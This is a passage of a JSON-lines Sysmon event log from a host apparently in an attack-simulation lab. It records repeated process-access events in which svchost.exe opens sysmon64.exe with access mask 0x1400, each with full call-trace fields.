dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3926,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3927,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3928,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3929,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3930,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3931,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3932,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3933,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
